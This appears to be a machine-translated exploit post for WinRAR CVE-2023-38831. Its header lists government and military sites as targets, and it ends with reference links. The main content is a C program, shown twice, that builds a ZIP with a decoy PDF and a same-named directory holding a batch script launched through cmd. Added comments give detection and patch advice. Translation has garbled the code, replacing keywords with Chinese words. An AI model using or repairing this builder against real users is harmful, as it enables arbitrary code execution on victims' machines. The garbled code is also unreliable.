##########
#利用标题: Exploit Winrar版本6.22漏洞CVE-2023-38831#
##
#作者: e1.coders#
##
#联系: e1.coders [at]邮件[dot] ru#
##
#安全风险:高#
##
#描述:所有目标的政府军事网站#
##
##########
##
#expl0its:#
#include stdio.h
#include stdlib.h
#include string.h
#include'zip.h'
/* Entry names used when the archive is assembled in main.
 * Note for defenders: folder_name repeats the pdf_file name followed by a
 * trailing space, so the archive listing shows a file and a directory with
 * near-identical names. That pairing is the structural indicator archive
 * scanners should flag for CVE-2023-38831. */
#define pdf_file'document.pdf'
#define folder_name'document.pdf \\'
/* Name of the script entry that is stored inside the look-alike directory. */
#define script_file'script.bat'
/* Output archive written to the current working directory. */
#define zip_file'exploit.zip'
/*
 * Proof-of-concept archive builder for CVE-2023-38831 (the page cites RARLAB
 * WinRAR before 6.23 as affected). It writes three entries into zip_file: a
 * copy of the local pdf_file, an empty entry named folder_name, and a script
 * entry stored under folder_name.
 *
 * NOTE(review): this listing is a machine-translated copy. Several C keywords
 * and identifiers were altered by the translation (see the non-ASCII tokens
 * below), so it does not compile as shown. The calls look like the minizip
 * zip.h API with the names lowercased - confirm against the original posting.
 *
 * Defender notes: the remediation is to run WinRAR 6.23 or later. For
 * detection, flag ZIP archives that hold a file entry together with a
 * directory entry of the same name plus a trailing space, in particular when
 * that directory contains a script or executable, and alert on WinRAR
 * spawning cmd.exe as a child process.
 *
 * Returns 0 once the archive is written, -1 on any failure.
 */
int main(void){
/* Create the output archive; a null handle means it could not be opened. */
zipfile zf=zipopen(zip_file,append_status_create);
如果(zf==null){
printf('错误打开zip文件\ n');
返回-1;
}
/* Per-entry metadata, zero-filled and reused for all three entries. */
zip_fileinfo Zfi;
memset(ZFI,0,sizeof(ZFI));
/* Entry 1: the decoy document, stored under the pdf_file name. */
if(zipopennewfileinzip(zf,pdf_file,zfi,null,0,null,0,null,null,z_deflated,z_default_compression)!=zip_ok){
printf('错误将pdf文件添加到zip文件\ n');
zipclose(ZF,null);
返回-1;
}
/* The decoy content is read from a local file of the same name. */
文件*fp=fopen(pdf_file,'rb');
如果(fp==null){
printf('错误打开PDF文件\ n');
Zipclosefileinzip(ZF);
zipclose(ZF,null);
返回-1;
}
/* Copy the local file into the open entry in chunks of 1024 bytes. */
char缓冲区[1024];
int bytes_read;
while(((bytes_read=fread(buffer,1,sizeof(buffer),fp),fp))0){
if(zipwriteinfileinzip(zf,buffer,bytes_read)0){
printf('错误将pdf文件写入zip文件\ n');
fclose(fp);
Zipclosefileinzip(ZF);
zipclose(ZF,null);
返回-1;
}
}
fclose(fp);
Zipclosefileinzip(ZF);
/* Entry 2: an empty entry named folder_name (decoy name plus trailing space). */
if(zipopennewfileinzip(zf,folder_name,zfi,null,0,null,0,null,null,z_deflated,z_default_compression)!=zip_ok){
printf('错误将文件夹添加到zip文件\ n');
zipclose(ZF,null);
返回-1;
}
Zipclosefileinzip(ZF);
/* Entry 3 name is folder_name followed by script_file. sprintf is unbounded;
 * both inputs are the short constants defined above, so 256 bytes suffices. */
char script_name [256];
sprintf(script_name,'%s%s',folder_name,script_file);
if(zipopennewfileinzip(zf,script_name,zfi,null,0,null,0,null,null,z_deflated,z_default_compression)!=zip_ok){
printf('错误将脚本文件添加到zip文件\ n');
zipclose(ZF,null);
返回-1;
}
/* The script body in this proof of concept only echoes a marker message. */
char script_content []='@echo off \ nstart cmd /c \'echo,您已被cve-2023-38831暂停\'\ n';
if(zipwriteinfileinzip(zf,script_content,strlen(script_content))0){
printf('将脚本文件写入zip文件\ n');
Zipclosefileinzip(ZF);
zipclose(ZF,null);
返回-1;
}
/* Close the last entry, then the archive, and report success. */
Zipclosefileinzip(ZF);
zipclose(ZF,null);
printf('zip文件成功创建\ n');
返回0;
}
nvd.nist.gov
nvd.nist.gov
github.com
www.logpoint.com
news.ycombinator.com
https://hdce.medium.com/cve-2023-38831-winrar- Zero-Zero-Zero-Zero-day-poses-new-fisks-for-traders-684911befad2
#利用标题: Exploit Winrar版本6.22漏洞CVE-2023-38831#
##
#作者: e1.coders#
##
#联系: e1.coders [at]邮件[dot] ru#
##
#安全风险:高#
##
#描述:所有目标的政府军事网站#
##
##########
##
#expl0its:#
#include stdio.h
#include stdlib.h
#include string.h
#include'zip.h'
/* Entry names used when the archive is assembled in main.
 * Note for defenders: folder_name repeats the pdf_file name followed by a
 * trailing space, so the archive listing shows a file and a directory with
 * near-identical names. That pairing is the structural indicator archive
 * scanners should flag for CVE-2023-38831. */
#define pdf_file'document.pdf'
#define folder_name'document.pdf \\'
/* Name of the script entry that is stored inside the look-alike directory. */
#define script_file'script.bat'
/* Output archive written to the current working directory. */
#define zip_file'exploit.zip'
/*
 * Second copy of the same proof-of-concept archive builder for CVE-2023-38831
 * (the page cites RARLAB WinRAR before 6.23 as affected). It writes three
 * entries into zip_file: a copy of the local pdf_file, an empty entry named
 * folder_name, and a script entry stored under folder_name.
 *
 * NOTE(review): this listing is a machine-translated copy. Several C keywords
 * and identifiers were altered by the translation (see the non-ASCII tokens
 * below), so it does not compile as shown.
 *
 * Defender notes: the remediation is to run WinRAR 6.23 or later. For
 * detection, flag ZIP archives that hold a file entry together with a
 * directory entry of the same name plus a trailing space, in particular when
 * that directory contains a script or executable, and alert on WinRAR
 * spawning cmd.exe as a child process.
 *
 * Returns 0 once the archive is written, -1 on any failure.
 */
int main(void){
/* Create the output archive; a null handle means it could not be opened. */
zipfile zf=zipopen(zip_file,append_status_create);
如果(zf==null){
printf('错误打开zip文件\ n');
返回-1;
}
/* Per-entry metadata, zero-filled and reused for all three entries. */
zip_fileinfo Zfi;
memset(ZFI,0,sizeof(ZFI));
/* Entry 1: the decoy document, stored under the pdf_file name. */
if(zipopennewfileinzip(zf,pdf_file,zfi,null,0,null,0,null,null,z_deflated,z_default_compression)!=zip_ok){
printf('错误将pdf文件添加到zip文件\ n');
zipclose(ZF,null);
返回-1;
}
/* The decoy content is read from a local file of the same name. */
文件*fp=fopen(pdf_file,'rb');
如果(fp==null){
printf('错误打开PDF文件\ n');
Zipclosefileinzip(ZF);
zipclose(ZF,null);
返回-1;
}
/* Copy the local file into the open entry in chunks of 1024 bytes. */
char缓冲区[1024];
int bytes_read;
while(((bytes_read=fread(buffer,1,sizeof(buffer),fp),fp))0){
if(zipwriteinfileinzip(zf,buffer,bytes_read)0){
printf('错误将pdf文件写入zip文件\ n');
fclose(fp);
Zipclosefileinzip(ZF);
zipclose(ZF,null);
返回-1;
}
}
fclose(fp);
Zipclosefileinzip(ZF);
/* Entry 2: an empty entry named folder_name (decoy name plus trailing space). */
if(zipopennewfileinzip(zf,folder_name,zfi,null,0,null,0,null,null,z_deflated,z_default_compression)!=zip_ok){
printf('错误将文件夹添加到zip文件\ n');
zipclose(ZF,null);
返回-1;
}
Zipclosefileinzip(ZF);
/* Entry 3 name is folder_name followed by script_file. sprintf is unbounded;
 * both inputs are the short constants defined above, so 256 bytes suffices. */
char script_name [256];
sprintf(script_name,'%s%s',folder_name,script_file);
if(zipopennewfileinzip(zf,script_name,zfi,null,0,null,0,null,null,z_deflated,z_default_compression)!=zip_ok){
printf('错误将脚本文件添加到zip文件\ n');
zipclose(ZF,null);
返回-1;
}
/* The script body in this proof of concept only echoes a marker message. */
char script_content []='@echo off \ nstart cmd /c \'echo,您已被cve-2023-38831暂停\'\ n';
if(zipwriteinfileinzip(zf,script_content,strlen(script_content))0){
printf('将脚本文件写入zip文件\ n');
Zipclosefileinzip(ZF);
zipclose(ZF,null);
返回-1;
}
/* Close the last entry, then the archive, and report success. */
Zipclosefileinzip(ZF);
zipclose(ZF,null);
printf('zip文件成功创建\ n');
返回0;
}
NVD - cve-2023-38831

NVD - cve-2023-38831

GitHub - HDCE-inc/CVE-2023-38831: CVE-2023-38831 PoC (Proof Of Concept)
CVE-2023-38831 PoC (Proof Of Concept). Contribute to HDCE-inc/CVE-2023-38831 development by creating an account on GitHub.
CVE-2023-38831 : RARLAB WinRAR before 6.23 allows attackers to execute arbitrary code when a user
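CVE-2023-38831 : RARLAB WinRAR before 6.23 allows attackers to execute arbitrary code when a user attempts to view a benign file within a ZIP archive. The issue occurs because a ZIP archive may include a benign file and also a folder that has the same name as the benign file, and the contents of the folder are processed during an attempt to access only the benign file.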
www.cvedetails.com

CVE-2023-38831: WinRAR - Decompression or Arbitrary Code Execution
Discover more about vulnerability CVE-2023-38831. Do you use WinRAR for ZIP files? If so you could be vulnerable. Read more.
